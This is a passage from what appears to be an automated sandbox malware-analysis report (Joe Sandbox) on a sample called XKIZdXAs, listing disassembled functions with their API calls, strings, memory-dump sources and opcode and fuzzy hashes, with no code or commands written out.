                                                                          • Instruction Fuzzy Hash: C741AE11A1EA4258EB00BB15A854ABAE390EB41BE5FC24131DD6E476B8FF3CD54BC720
                                                                          Function 00007FF7ADC83E20 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                          • String ID: :$\$\??\%s
                                                                          • API String ID: 3827137101-3457252023
                                                                          • Opcode ID: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                          • Instruction ID: cc0d73f0c2bcd6d0de1d3089f11dd7f9c9901670c5da2e935dc807259c638b8a
                                                                          • Opcode Fuzzy Hash: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                          • Instruction Fuzzy Hash: 0041AF22A1D78389E720AB21E8046FDA3A0FF85799FC51135DA4D43AA8EF7CD647C710
                                                                          Function 00007FF7ADCA055C Relevance: 16.9, APIs: 11, Instructions: 371registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                          • String ID:
                                                                          • API String ID: 3218304859-0
                                                                          • Opcode ID: 56613195d31d9b8dc67beba3ae71979573c24aebd7d9093bc0b17d223b1a2dd4
                                                                          • Instruction ID: c321325543b9acf87fb6635fe9d7b53ab870f38c7c7f154e87adc23a6bc49aef
                                                                          • Opcode Fuzzy Hash: 56613195d31d9b8dc67beba3ae71979573c24aebd7d9093bc0b17d223b1a2dd4
                                                                          • Instruction Fuzzy Hash: 07F17232B0EA428EEB10EF65D0902ADB371EB89B98B964531DE4D47779EF38D402C754
                                                                          Function 00007FF7ADC883D4 Relevance: 16.8, APIs: 11, Instructions: 255comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                          • String ID:
                                                                          • API String ID: 2762341140-0
                                                                          • Opcode ID: 3f2bc404d53d5998161f0ee2b8df4f9bc3160e202cb50a098f9587f0d2c0f7e1
                                                                          • Instruction ID: e34ad987ce3483ba65069eaecd15433cd57e5091ee61a56f131331342dd266c2
                                                                          • Opcode Fuzzy Hash: 3f2bc404d53d5998161f0ee2b8df4f9bc3160e202cb50a098f9587f0d2c0f7e1
                                                                          • Instruction Fuzzy Hash: 92C15C26A09B4589EB10EF66E8801ADB770FB88B94F864036DE4E47B75EF38D546C710
                                                                          Function 00007FF7ADC6C5FC Relevance: 16.7, APIs: 11, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                          • String ID:
                                                                          • API String ID: 1255039815-0
                                                                          • Opcode ID: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                          • Instruction ID: 4f4a6be16b28ea573ec4df8f4d42328fd48effcb4d9beee0c72bbb3881d6be4a
                                                                          • Opcode Fuzzy Hash: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                          • Instruction Fuzzy Hash: B861B332F1965289EB10EFA1D9405AC7BB4FB44B88BC59135DE4D53BA8EF38D846C360
                                                                          Function 00007FF7ADC859D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 96COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                          • API String ID: 4194297153-14809454
                                                                          • Opcode ID: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                          • Instruction ID: 269dc1e814da78ebcad7f21c076e1278e810a564d453e127275ef1b5f350d191
                                                                          • Opcode Fuzzy Hash: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                          • Instruction Fuzzy Hash: A9415F22A1EB0699EB10AF65D4805BCA771FB48B95FD68431DA0D037B5EF78E586C320
                                                                          Function 00007FF7ADC96C34 Relevance: 15.3, APIs: 10, Instructions: 296fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                          • String ID:
                                                                          • API String ID: 2395222682-0
                                                                          • Opcode ID: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                          • Instruction ID: d597086f37c536fc67b13efe0351aaab0f002325486ef5c790ff3ff6359aa27d
                                                                          • Opcode Fuzzy Hash: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                          • Instruction Fuzzy Hash: 79D15036B09B568AEB10AF75D4402ADB3A1FB44B88FD24036EE5D57BA4EF38D446C350
                                                                          Function 00007FF7ADCAA59C Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$LongWindow
                                                                          • String ID:
                                                                          • API String ID: 312131281-0
                                                                          • Opcode ID: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                          • Instruction ID: 0514d50e70fc43836a43ab0a7e2b7030d7ea4ab868011b6f1bd1d310392dd975
                                                                          • Opcode Fuzzy Hash: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                          • Instruction Fuzzy Hash: 5471BE3661AA8189E760EF65D8546EE6760FB88B94FC10132EA0D47BB4EF3CD587C710
                                                                          Function 00007FF7ADC90D24 Relevance: 15.1, APIs: 10, Instructions: 86clipboardmemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                          • String ID:
                                                                          • API String ID: 1737998785-0
                                                                          • Opcode ID: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                          • Instruction ID: 5cf3ea2af7dd3df6024988f2ce92cc59ec0f7acce0a7d08bfbd795362f83008d
                                                                          • Opcode Fuzzy Hash: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                          • Instruction Fuzzy Hash: 43417E72A0E6828AEB04AF55D594378B761FF84B85FC64434DA4E077B2EF7CE0428720
                                                                          Function 00007FF7ADC42650 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155timeCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                          • String ID: ?
                                                                          • API String ID: 500310315-1684325040
                                                                          • Opcode ID: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                          • Instruction ID: 7b7fc070f5f3b7e375369a37d60859721274ea528f1fe2504cd7c45c741ffab2
                                                                          • Opcode Fuzzy Hash: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                          • Instruction Fuzzy Hash: ED61D2B2A0D6428EE760AF20D8491A9F7A1FF48794FC24131E94D436A4FF3CD542C720
                                                                          Function 00007FF7ADC93940 Relevance: 12.1, APIs: 8, Instructions: 116networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                                                          • String ID:
                                                                          • API String ID: 540024437-0
                                                                          • Opcode ID: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                          • Instruction ID: 1c63db5814e4972a91655f48c2999ee0316365f76aa180cbcfcc59a93cb42445
                                                                          • Opcode Fuzzy Hash: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                          • Instruction Fuzzy Hash: D3419161A0D6528AEB10FF56D440279B760FB85FA0FD64530EA9E477A2EF3CD1428724
                                                                          Function 00007FF7ADC98360 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 331COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                          • API String ID: 0-572801152
                                                                          • Opcode ID: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
                                                                          • Instruction ID: b3aa3f2a46d6a680b2874b08573a03bc7f03b6027a1f01f5a68d450d80a5c045
                                                                          • Opcode Fuzzy Hash: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
                                                                          • Instruction Fuzzy Hash: B3E1A136A09B828AEB10DF65D4402EDB7A1FB84758FC14236EA4D57B64FF38D646C710
                                                                          Function 00007FF7ADC78E18 Relevance: 10.6, APIs: 7, Instructions: 145windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                                          • Instruction ID: e5898d7580d9c4089759c25ab1ef20f748600ba2f0a959309dc3e66362815a3c
                                                                          • Opcode Fuzzy Hash: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                                          • Instruction Fuzzy Hash: 5C510422A0E2D159F771A7715100ABDAF61FF46BC0FCA8074EB8907E96DE1CE8568731
                                                                          Function 00007FF7ADC7BC70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                          • String ID: \*.*
                                                                          • API String ID: 2649000838-1173974218
                                                                          • Opcode ID: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                          • Instruction ID: f6331f7ed2fda7d449a12a28ea8dae283cd62fbf92ea97cc0daa87607efe3770
                                                                          • Opcode Fuzzy Hash: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                          • Instruction Fuzzy Hash: 8141A821A2DA4299EB50FB10E4402ADE360FF94B94FD65031EA5E436E9EF7CD507CB10
                                                                          Function 00007FF7ADC94C58 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
                                                                          • String ID:
                                                                          • API String ID: 383626216-0
                                                                          • Opcode ID: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                                          • Instruction ID: b37daee17f7892cf742d3772cb25bd3f8772151dbe9d2d15d8de86024bfe6df1
                                                                          • Opcode Fuzzy Hash: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                                          • Instruction Fuzzy Hash: A931A373B096528FE754DF61D4807AC77A2FB88748F910235EE0A53A94EF38E946CB50
                                                                          Function 00007FF7ADC3AF58 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                          • Instruction ID: 8f127fcaa36a525eb6be69b269c0dd0bcc789427a35222fa88f92cf20e423afa
                                                                          • Opcode Fuzzy Hash: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                          • Instruction Fuzzy Hash: 8031823661DB818ED760EF24E8442AEB3A4FB88754FD10136EA9D43B65EF3CC5468B10
                                                                          Function 00007FF7ADC8A874 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118filesleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                          • String ID: *.*
                                                                          • API String ID: 1927845040-438819550
                                                                          • Opcode ID: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                          • Instruction ID: 2364e2788b3dfaf0da95490c0ecc51732a10b23a404b89d10911d17a7d7eb7db
                                                                          • Opcode Fuzzy Hash: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                          • Instruction Fuzzy Hash: D9518322A0EB8299EB10EB15E4506ADA370FB45B94FD60132DE5D437A9EF3CD647C710
                                                                          Function 00007FF7ADC0BE70 Relevance: 8.6, Strings: 6, Instructions: 1141COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ERCP$PCRE$VUUU$VUUU$VUUU$VUUU
                                                                          • API String ID: 0-2187161917
                                                                          • Opcode ID: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                                          • Instruction ID: 7c9c40da35b1a62ee25d7484e36693f78a8e315fbcc530a8b4aa8879595aa9db
